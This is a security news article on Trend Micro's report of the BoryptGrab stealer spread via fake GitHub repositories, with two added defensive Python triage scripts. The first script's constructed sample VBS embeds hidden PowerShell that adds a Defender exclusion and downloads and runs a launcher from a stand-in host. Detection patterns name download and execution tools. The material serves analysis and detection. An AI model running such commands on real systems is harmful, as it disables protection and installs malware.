Massive GitHub malware operation spreads BoryptGrab stealer

Trend Micro found BoryptGrab stealer spreading through 100+ GitHub repositories, stealing browser data, crypto wallets, system information, and user files.

Trend Micro uncovered a campaign distributing the BoryptGrab information stealer through more than 100 GitHub repositories.

BoryptGrab is designed to collect browser and cryptocurrency wallet data, system details, and common user files. Some variants also deploy a PyInstaller-packaged backdoor called TunnesshClient, which opens a reverse SSH tunnel so the attackers can reach the infected host.

The malware is distributed via ZIP archives posing as software tools and game cheats, linked to over 100 GitHub repositories.

“By tracing the infection chain, we were able to observe several ZIP archive files in the wild (all with similar naming conventions) that masquerade as common software tools (including gaming cheat hacks),” reads the report published by Trend Micro. “As the ‘github-io’ patterns in some ZIP file names suggest, searching for the software tool patterns leads to over a hundred public GitHub repositories delivering malware.”

Russian-language comments found in both the malware samples and the delivery infrastructure suggest the operators may be of Russian origin.

Attackers spread the malware through public GitHub repositories that pose as free software tools, game cheats, or utilities.

They stuff README files with SEO keywords so that search engines rank the malicious repositories near legitimate results. One example mimics a Voicemod Pro download page and links to a GitHub Pages (github.io) site that looks like a normal project directory.

The page contains Russian comments and redirects visitors through a chain of encoded URLs until it reaches a fake download page that generates a ZIP archive containing the malware. Many repositories reuse the same logic and sometimes send tracking data to the attackers.

The downloaded ZIP files launch the infection through several methods. In one route, an executable side-loads a malicious libcurl.dll bundled in the same archive; the DLL decrypts and runs a hidden launcher payload.

The launcher downloads the BoryptGrab information stealer and may also retrieve other payloads, including Vidar variants, a PyInstaller backdoor called TunnesshClient, and a Golang downloader named HeaconLoad. The launcher uses build names such as Shrek, Leon, or CryptoByte to request specific payloads and sets scheduled tasks to keep the malware running.

“Some launcher payload variants contain build names (with some differing from each other). The launcher payload passes the build name as the ‘-b’ argument when executing the BoryptGrab stealer it downloads,” continues the report.

Another infection path uses a VBS downloader that stores its commands as integer arrays and rebuilds them at runtime. The script decodes PowerShell commands, downloads a launcher from a remote server, and can also add Microsoft Defender exclusions to avoid detection. That launcher then retrieves the BoryptGrab stealer and other tools from the attacker’s infrastructure.
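As an added example (not code from the Trend Micro report or from the campaign’s samples), the following Python script statically decodes the kind of integer-array obfuscation described above and flags what the recovered commands do, so an analyst can triage such a VBS file without running it. The VBS embedded in it is constructed for the example: the variable names, the +7 offset applied before Chr(), the URL and the file names are all hypothetical, and the real scripts’ exact layout is not given in the article.

```python
"""Static decoder for VBS droppers that hide commands in integer arrays.

Added example, not code from the Trend Micro report or from the campaign's
samples. SAMPLE_VBS below is constructed to mimic the technique; the real
scripts' exact layout (offset, variable names, URLs) is not given in the
article and everything here is hypothetical.
"""
import re


def _vbs_array(text: str, shift: int) -> str:
    """Build a VBS Array(...) literal of shifted character codes.
    Used only to construct the sample; an analyst starts from the script itself."""
    return "Array(" + ",".join(str(ord(ch) + shift) for ch in text) + ")"


# Hypothetical decoded commands: a Defender exclusion, then a download-and-run.
PAYLOAD_EXCLUSION = 'powershell -w hidden -c "Add-MpPreference -ExclusionPath $env:TEMP"'
PAYLOAD_DOWNLOAD = (
    'powershell -w hidden -c "Invoke-WebRequest https://example.test/launcher.exe '
    '-OutFile $env:TEMP\\launcher.exe; Start-Process $env:TEMP\\launcher.exe"'
)

# Constructed VBS: each command is an integer array of Chr codes shifted by +7,
# rebuilt in a loop with Chr(x(i) - 7) and handed to WScript.Shell.
SAMPLE_VBS = f"""
Dim a, b, i, s
a = {_vbs_array(PAYLOAD_EXCLUSION, 7)}
b = {_vbs_array(PAYLOAD_DOWNLOAD, 7)}
For i = 0 To UBound(a): s = s & Chr(a(i) - 7): Next
CreateObject("WScript.Shell").Run s, 0, False
s = ""
For i = 0 To UBound(b): s = s & Chr(b(i) - 7): Next
CreateObject("WScript.Shell").Run s, 0, False
"""

# name = Array(1,2,3,...)
ARRAY_RE = re.compile(r"(\w+)\s*=\s*Array\(\s*([\d\s,]+)\)", re.IGNORECASE)
# Chr(name(i)), Chr(name(i) - 7), Chr(name(i)+3): captures name, sign, constant
CHR_RE = re.compile(r"Chr\(\s*(\w+)\s*\(\s*\w+\s*\)\s*(?:([+-])\s*(\d+))?\s*\)", re.IGNORECASE)

# Behaviours worth flagging in a decoded command (order = report order)
SUSPICIOUS = {
    "defender exclusion": re.compile(r"(Add|Set)-MpPreference", re.I),
    "download": re.compile(r"Invoke-WebRequest|DownloadFile|DownloadString|\biwr\b|\bcurl\b|bitsadmin", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution": re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I),
}


def find_shifts(script: str) -> dict:
    """Map each array variable to the arithmetic offset the script applies inside Chr()."""
    shifts = {}
    for name, sign, k in CHR_RE.findall(script):
        shifts[name.lower()] = 0 if not k else (int(k) if sign == "+" else -int(k))
    return shifts


def decode_arrays(script: str) -> dict:
    """Decode every Array(...) literal using the offset found for that variable (0 if none)."""
    shifts = find_shifts(script)
    decoded = {}
    for name, body in ARRAY_RE.findall(script):
        codes = [int(tok) for tok in body.split(",") if tok.strip()]
        shift = shifts.get(name.lower(), 0)
        decoded[name] = "".join(chr(code + shift) for code in codes)
    return decoded


def triage_vbs(script: str) -> list:
    """Return (variable, decoded command, behaviour flags) for each hidden string."""
    return [
        (name, text, [label for label, rx in SUSPICIOUS.items() if rx.search(text)])
        for name, text in decode_arrays(script).items()
    ]


if __name__ == "__main__":
    for name, text, flags in triage_vbs(SAMPLE_VBS):
        print(f"{name}: {text}")
        print(f"    flags: {', '.join(flags) or 'none'}")
```

The decoder reads the offset from the Chr() expression rather than assuming one, so a script that uses plain Chr(a(i)) or a different constant decodes the same way; an Xor-based variant would need a further case. The point for a responder is that the Defender exclusion shows up in the decoded text, which is also where a detection rule should look, not in the raw script.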

In some variants, a .NET loader or embedded scripts trigger the same process, while others include the HeaconLoad downloader directly. HeaconLoad maintains persistence with registry entries and scheduled tasks, sends system information to a command-and-control server, and downloads additional bundles when available.
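Both the launcher described above and HeaconLoad persist through scheduled tasks and registry Run entries. The Python script below, an added example that is not code from the Trend Micro report, triages exported copies of those artifacts offline: the scheduled-task XML (as produced by `schtasks /query /tn <name> /xml` or Export-ScheduledTask) and a `reg export` of the user’s Run key. The artifacts, task names, paths and value names are constructed and hypothetical. It scores each configured command on signals this infection chain would produce (a program launched from a user-writable directory, a script host or LOLBin, encoded PowerShell) and deliberately includes a legitimate OneDrive entry to show that a user-writable path alone is a weak signal that needs corroboration.

```python
"""Triage of Windows persistence artifacts: scheduled-task XML and Run-key entries.

Added example, not code from the Trend Micro report. The task XML and the
.reg export below are constructed; task names, paths and value names are
hypothetical.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed: task XML keyed by task path (one benign system task, one hypothetical implant).
SAMPLE_TASKS = {
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\defrag.exe</Command>
      <Arguments>-c -h -o -$</Arguments>
    </Exec>
  </Actions>
</Task>""",
    r"\SystemUpdateHelper": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\alice\AppData\Roaming\Update\launcher.exe</Command>
    </Exec>
  </Actions>
</Task>""",
}

# Constructed: a `reg export` style dump of HKCU\...\CurrentVersion\Run.
SAMPLE_RUN_KEYS = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"WinUpdateSvc"="wscript.exe //B \"C:\\Users\\alice\\AppData\\Local\\Temp\\svc.vbs\""
"""

REG_VALUE_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"\s*$')   # "name"="value"
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
USER_WRITABLE = re.compile(
    r"%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|PUBLIC|PROGRAMDATA|USERPROFILE)%"
    r"|\\Users\\[^\\]+\\AppData\\|\\Users\\Public\\|\\ProgramData\\|\\Windows\\Temp\\",
    re.I,
)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|powershell|pwsh|mshta|rundll32|regsvr32|cmd)(\.exe)?\b", re.I)
ENCODED_PS = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)


def parse_task_actions(task_path: str, xml_text: str) -> list:
    """Return (task path, full command line) for every Exec action in a task XML."""
    root = ET.fromstring(xml_text)
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        actions.append((task_path, f"{cmd} {args}".strip()))
    return actions


def parse_run_entries(reg_text: str) -> list:
    """Return (key\\value name, command) for values under any Run / RunOnce key in a .reg export."""
    entries, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = REG_VALUE_RE.match(line)
        if m and key and RUN_KEY_RE.search(key):
            value = re.sub(r"\\(.)", r"\1", m.group(2))  # undo .reg escaping of \ and "
            entries.append((f"{key}\\{m.group(1)}", value))
    return entries


def assess(command: str) -> list:
    """Flags for one persistence command; several together are the real signal."""
    flags = []
    if USER_WRITABLE.search(command):
        flags.append("runs from user-writable path")
    if SCRIPT_HOST.search(command):
        flags.append("script host / LOLBin")
    if ENCODED_PS.search(command):
        flags.append("encoded PowerShell")
    return flags


def triage_persistence(tasks_by_path: dict, reg_text: str) -> list:
    """Return (source, command, flags) for every task action and Run entry."""
    items = []
    for path, xml_text in tasks_by_path.items():
        items.extend(parse_task_actions(path, xml_text))
    items.extend(parse_run_entries(reg_text))
    return [(src, cmd, assess(cmd)) for src, cmd in items]


if __name__ == "__main__":
    for src, cmd, flags in triage_persistence(SAMPLE_TASKS, SAMPLE_RUN_KEYS):
        print(f"[{len(flags)}] {src}\n     {cmd}\n     {', '.join(flags) or 'no flags'}")
```

On the sample data the defrag task gets no flags, the OneDrive entry and the hypothetical launcher task each get only the user-writable-path flag, and the wscript entry gets two; in practice the single-flag hits are where signature checks and hash lookups of the referenced binary decide the question.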

Several payloads rely on obfuscation techniques such as XOR-encrypted strings, dynamic API resolution, and code injection. Russian-language comments and log messages appear throughout the infrastructure and malware samples, suggesting the operators likely have a Russian background.

BoryptGrab is a C/C++ information stealer designed to collect large amounts of sensitive data from infected systems. The malware accepts optional command-line arguments such as --output-path (-o) to define where stolen data is staged and --build-name (-b) to tag the collected information. If the operators do not supply a build name, the malware falls back to a default value or to hardcoded identifiers such as CryptoByte, Shrek, Sonic, or Yaropolk, which help them track infections.

Before collecting data, BoryptGrab performs anti-analysis checks.

“BoryptGrab detects whether it is executed in a virtual machine environment by querying registry entries and checking VM-related files. As part of its anti-analysis check, BoryptGrab also compares the names of running processes against a predefined list. It also attempts to execute with elevated privilege,” continues the report. “When the ‘--output-path’/‘-o’ argument is not given, BoryptGrab formats a default output path name using the current time, public IP address, and country code. Later, a directory with this output path name is created to stage collected data.”

It searches for signs of virtual machines, scans running processes against a predefined list, and attempts to gain elevated privileges. If no output path is specified, it creates a directory using the current time, public IP address, and country code to store stolen data.

The stealer targets data from many browsers, including Chrome, Edge, Firefox, Opera, Brave, Vivaldi, and Yandex. It uses techniques from public GitHub tools designed to bypass Chrome’s App-Bound Encryption and decrypt stored browser credentials. The malware loads an encrypted internal payload that extracts saved passwords and records installed applications.

BoryptGrab also downloads a helper tool to assist with Chromium-based browser extraction. Beyond browser data, it steals information from numerous desktop cryptocurrency wallets such as Exodus, Electrum, Ledger Live, Atomic, Binance, Wasabi, and Trezor. It captures screenshots, gathers system details, and includes a “file grabber” module that collects files with specific extensions from common directories. The malware also extracts Telegram files, browser passwords, and in newer variants, Discord tokens.

After gathering the data, BoryptGrab compresses and uploads the archive to the attacker’s server. Some variants also download TunnesshClient, a PyInstaller backdoor that establishes a reverse SSH tunnel, allowing attackers to run commands, move files, and use the infected system as a proxy.

“The BoryptGrab campaign illustrates an evolving threat ecosystem targeting users through deceptive software downloads and fake GitHub repositories,” concludes the report.


Pierluigi Paganini

(SecurityAffairs – hacking, malware)
